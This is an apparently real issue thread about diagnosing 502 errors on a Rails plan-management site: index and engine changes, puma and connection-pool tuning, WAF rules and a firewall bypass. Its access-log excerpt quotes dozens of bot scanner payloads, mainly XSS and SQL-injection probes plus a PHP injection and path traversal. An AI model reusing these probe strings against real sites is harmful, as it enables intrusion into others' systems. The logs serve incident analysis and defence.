Closed — briri closed this issue 1 week ago
Decided to do some analysis of the various 502 errors to see if one path was throwing the error more than others, but they're all about the same.
502 counts per path (combined across both hosts):
POST /answers/create_or_update?question_id={question_id}
GET /plans/{plan_id}/download
GET /public_plans
GET /plans/{plan_id}/export.pdf?{args}
I've done the query optimization mentioned above for the first two. Will do the same for the other two on Monday.
On Sunday:
[16/Jun/2024:04:44:40 -0700] "GET /secure/Dashboard.jspa HTTP/1.1" 302 502
[16/Jun/2024:04:45:33 -0700] "GET /cgi-bin/upload/web-ftp.cgi HTTP/1.1" 302 502
This indicates that the WAF rules that block access to plans/{plan_id}/download and plans/{plan_id}/export.pdf were responsible for blocking puma workers.
I did some further analysis of the queries being executed on these pages and performed the following operations on the database:
answers table: ALTER TABLE answers ENGINE=InnoDB;
settings table (it had no indices): ALTER TABLE settings ADD INDEX settings_target (target_id, target_type);
The settings table has around 1,150,000 records and had no indices other than its PK (a Rails auto-increment id).
After making those 2 changes I am now able to refresh both pages 20-30 times without inducing a Proxy error.
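As a rough illustration of why that composite index matters at this scale, the toy Ruby sketch below (hypothetical data and names, not the real schema) contrasts the full-table scan MySQL had to do before with the keyed lookup the settings_target index enables:

```ruby
# Toy illustration: looking up settings rows by (target_id, target_type).
Setting = Struct.new(:id, :target_id, :target_type, :value)

# Fake data standing in for the ~1.15M-row settings table.
rows = Array.new(50_000) { |i| Setting.new(i, i % 10_000, i.even? ? "Plan" : "Org", "v#{i}") }

# Without an index: the database must examine every row (full table scan).
scan = rows.select { |r| r.target_id == 1234 && r.target_type == "Plan" }

# With the settings_target index: a direct seek on the composite key.
index = rows.group_by { |r| [r.target_id, r.target_type] }
seek  = index[[1234, "Plan"]] || []

puts seek.map(&:id) == scan.map(&:id)  # => true -- same rows, far less work per query
```

The real win is that the seek cost stays roughly constant as the table grows, while the scan cost grows with every insert.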
I performed the following actions on prod:
answers table: ALTER TABLE answers ENGINE=InnoDB;
settings table: ALTER TABLE settings ADD INDEX settings_target (target_id, target_type);
Updated controllers/plans_controller.rb, controllers/answers_controller.rb, and views/branded/plans/_download_form.html.erb, which back the plans/{plan_id}/download and plans/{plan_id}/export.pdf pages (also added the changes to Git so they will be in the next AL2023 release).
I also updated our system notification to read (in English and Portuguese): "We are currently experiencing technical issues. DMP downloading may result in intermittent 502 errors. We apologize for the inconvenience and hope to resolve it within a few business days."
I will be monitoring the site throughout the day to see if the 502 issue has been resolved by these changes.
As of 9am there are no new 502 Proxy errors.
Checking again at noon and there is only one additional 502 on each host:
[16/Jun/2024:11:38:26 -0700] "GET /cgi-bin/PrintShibInfo.pl HTTP/1.1" 302 502
(different times)
Checked again at 17:10 and only 2 additional 502 messages:
[16/Jun/2024:14:52:25 -0700] "GET /orgs/search?context=9ac631b9524f&funder_only=false&known_only=false&managed_only=false&non_funder_only=false&template_owner_only=false&unknown_only=false&org_autocomplete%5Bname%5D=uni HTTP/1.1" 502 413
[16/Jun/2024:16:06:51 -0700] "GET /orgs/search?context=3819c5a048f0&funder_only=true&known_only=false&managed_only=false&non_funder_only=false&template_owner_only=false&unknown_only=false&org_autocomplete%5Bname%5D=uni HTTP/1.1" 502 413
Very promising. Thanks for keeping an eye on things and reporting out over the weekend.
Checking again at 22:00. The logs have rotated; the current log begins at 18:58. Even with significant bot activity, there are no 502 errors. Matomo shows only 175 visitors today, so slow weekend traffic. Will continue to monitor tomorrow.
Checking again at 8:00 and there are only a few 502s:
172.30.4.32 - - [17/Jun/2024:04:51:11 -0700] "GET /orgs/search?context=5c6178780b0e&funder_only=false&known_only=false&managed_only=false&non_funder_only=false&template_owner_only=false&unknown_only=false&org_autocomplete%5Bname%5D=UNI HTTP/1.1" 502 413
172.30.4.32 - - [17/Jun/2024:04:51:21 -0700] "GET /orgs/search?context=5c6178780b0e&funder_only=false&known_only=false&managed_only=false&non_funder_only=false&template_owner_only=false&unknown_only=false&org_autocomplete%5Bname%5D=UNI HTTP/1.1" 502 413
172.30.43.110 - - [17/Jun/2024:05:46:56 -0700] "GET /orgs/search?context=7b4906feccbe&funder_only=false&known_only=false&managed_only=false&non_funder_only=false&template_owner_only=false&unknown_only=false&org_autocomplete%5Bname%5D=UNI HTTP/1.1" 502 413
172.30.43.110 - - [17/Jun/2024:05:47:04 -0700] "GET /plans/73986/export.pdf?export[question_headings]=true HTTP/1.1" 502 413
172.30.43.110 - - [17/Jun/2024:05:47:13 -0700] "GET /orgs/search?context=7b4906feccbe&funder_only=false&known_only=false&managed_only=false&non_funder_only=false&template_owner_only=false&unknown_only=false&org_autocomplete%5Bname%5D=UNI HTTP/1.1" 502 413
172.30.43.110 - - [17/Jun/2024:05:47:23 -0700] "GET /orgs/search?context=7b4906feccbe&funder_only=false&known_only=false&managed_only=false&non_funder_only=false&template_owner_only=false&unknown_only=false&org_autocomplete%5Bname%5D=UNI HTTP/1.1" 502 413
172.30.31.87 - - [17/Jun/2024:06:07:33 -0700] "GET /orgs/search?context=746ea9df554a&funder_only=false&known_only=false&managed_only=false&non_funder_only=false&template_owner_only=false&unknown_only=false&org_autocomplete%5Bname%5D=University%20 HTTP/1.1" 502 413
Patched the code behind the /orgs/search endpoint above to optimize its performance.
We got a bunch of new 502 errors over the lunch break, but they look like they were all bot traffic; it doesn't look like legitimate users were affected:
172.94.95.9 - - [17/Jun/2024:11:37:41 -0700] "GET /webadmin/deny/index.php?dpid=1&dpruleid=1&cat=1&ttl=5018400&groupname=<group_name_eg_netsweeper_student_allow_internet_access&policyname=auto_created&username=root&userip=127.0.0.1&connectionip=127.0.0.1&nsphostname=netsweeper&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:38:01 -0700] "GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>&dSecurityGroup&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:38:41 -0700] "GET /bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db=\"><script>prompt(document.domain)</script> HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:38:46 -0700] "GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\"%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:38:57 -0700] "GET /wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=</script>\"><script>alert(document.domain)</script> HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:39:55 -0700] "GET /?cda'\"</script><script>alert(document.domain)</script>&locale=locale=de-DE HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:40:04 -0700] "GET /info.php?RESULT=\",msgArray);alert(document.domain);// HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:40:13 -0700] "GET /plus/ajax_officebuilding.php?act=key&key=%e9%8c%a6%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5(999999999),5,6,7,8,9%23 HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:40:41 -0700] "GET /www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\" HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:41:07 -0700] "GET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q=aHR0cDovL2xpa2VidG4uY29tLm9hc3QubWU=\" HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:41:29 -0700] "GET /wp-admin/admin-ajax.php?action=woof_draw_products&woof_redraw_elements[]=<img%20src=x%20onerror=alert(document.domain)> HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:41:41 -0700] "GET /index.php?SQ=0&srch=x\"+onmouseover%3Dalert%281%29+x%3D\"&t=search&btn_submit.x=0&btn_submit.y=0 HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:41:46 -0700] "GET /forum/index.php?SQ=0&t=search&srch=2i1Dp2jFPI8yZekCBpuM4utK3zW&btn_submit=Search&field=all&forum_limiter&attach=0&search_logic=AND&sort_order=REL&author=x\"+onmouseover%3Dalert%28document.domain%29+x%3D%22 HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:41:54 -0700] "GET /man.cgi?redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port&TF_port&B_mac_apply=APPLY HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:42:35 -0700] "GET /fmlurlsvc/?url=https%3A%2F%2Fgoogle.com<Svg%2Fonload%3Dalert(document.domain)> HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:43:00 -0700] "GET /?p=1&xsg-provider=data://text/html,<?php%20echo%20md5(\"CVE-2022-0346\");%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:43:04 -0700] "GET /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B\"id\":\"1\"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:43:18 -0700] "GET /wp-admin/admin-ajax.php?action=ptp_design4_color_columns&post_id=1&column_names=<script>alert(document.domain)</script> HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:43:50 -0700] "GET /modifica_cliente.php?tipo_tabella=%22><script>javascript:alert(%27XSS%27)</script>&idclienti=1 HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:44:05 -0700] "GET /dati/availability_tpl.php?num_app_tipo_richiesti1=%22><script>javascript:alert(%27XSS%27)</script> HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:44:37 -0700] "GET /wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php?keyword=\"><script>alert(document.domain)</script> HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:44:47 -0700] "GET /wp-admin/admin-ajax.php?action=cdaily&subaction=cd_displayday&callback=1&bymethod&by_id=/../../../../../../r%26_=--><script>alert(document.cookie)</script> HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:45:01 -0700] "GET /web/set_profiling?profile=0&collectors=<script>alert(document.domain)</script> HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:46:11 -0700] "GET /webmail/?mid=aub5\"><img+src=x+onerror=confirm(document.domain)> HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:46:23 -0700] "GET /search?filtered=1&q=test&filter[price]=100-1331\"><script>alert(document.cookie)</script>&filter[attr][Memory][]=16+GB HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:46:38 -0700] "GET /search?filter[brandid]=vnxjb\"><script>alert(document.cookie)</script>bvu51 HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:46:39 -0700] "GET //tagebuch/eintraege/index.html?reloaded&page=1\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:46:43 -0700] "GET /wp-json/lp/v1/load_content_via_ajax/?callback={\"class\"%3a\"LP_Debug\",\"method\"%3a\"var_dump\"}&args=\"2i1DoC1Dq8AMUkWiiSCV04SM4P6\" HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:46:58 -0700] "GET /coda/frameset?cols=\"><frame%20src=\"javascript:alert(document.domain)\"> HTTP/1.1" 502 416
We discovered that the above set of 502s came from paths that should have been blocked by the firewall. Further investigation showed that the traffic was going directly to the instance instead of through the domain name, which would have routed it through the firewall/load balancer. IAS updated the security group so that this is no longer allowed.
Closed after a few days of no issues
Just jotting down some final notes with regard to the increased 502 error activity we started seeing today.
Additional analysis after the call ended:
On Monday:
Remove the WAF filters for the downloads and exports.
Start blocking traffic to /cgi-bin
Revert the number of puma workers back down to 2 (the recommendation is one per CPU).
Increase the DB connection pool so it is slightly higher than the total number of threads (currently set to 16 DB connections, but we bumped the workers to 8 with 5 threads each, i.e. 40 threads!).
Add rate limiting to prevent a single IP from hitting our problematic paths more than a certain number of times within a given window (suggestion from ChatGPT).
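The worker/thread arithmetic behind the last two items can be sanity-checked in a few lines (the counts come from the notes above; the comment about per-process pools is general Rails/puma behavior, not something decided on the call):

```ruby
# Capacity arithmetic from the incident notes.
workers            = 8    # bumped during the incident
threads_per_worker = 5
db_pool            = 16   # current connection pool setting

total_threads = workers * threads_per_worker
puts total_threads                         # 40 threads contending for 16 connections

# After reverting to one worker per CPU on Monday:
reverted_total = 2 * threads_per_worker    # 10 total threads

# Note: with clustered (forked) puma, each worker process has its own
# ActiveRecord pool, so the pool setting must cover threads_per_worker, and
# the DB server's max_connections must cover workers * pool.
```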
Queries were being made to the Pilot pages while we were debugging. I doubt it is related, but it's worth seeing whether that activity ticked up on Friday vs. Mon-Wed.
Need to continue to find an alternative for the PDF downloads.
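For the rate-limiting item on the Monday list, one common Rails mechanism (an assumption — no specific tool was chosen on the call) is the rack-attack gem. The initializer below is an illustrative sketch: the limit and period are guesses, and the paths are taken from the 502 counts earlier in this thread.

```ruby
# config/initializers/rack_attack.rb -- sketch using the rack-attack gem
# (limit/period values below are placeholders, not agreed-upon numbers)
PROBLEM_PATHS = [
  %r{\A/plans/\d+/download},
  %r{\A/plans/\d+/export\.pdf},
  %r{\A/orgs/search},
  %r{\A/answers/create_or_update}
].freeze

# Allow at most 10 hits per IP per 60 seconds across the 502-prone paths.
Rack::Attack.throttle("problem-paths/ip", limit: 10, period: 60) do |req|
  req.ip if PROBLEM_PATHS.any? { |path| req.path.match?(path) }
end
```

Throttled requests get a 429 by default, which would also make bot hammering visible in the logs as something other than a 502.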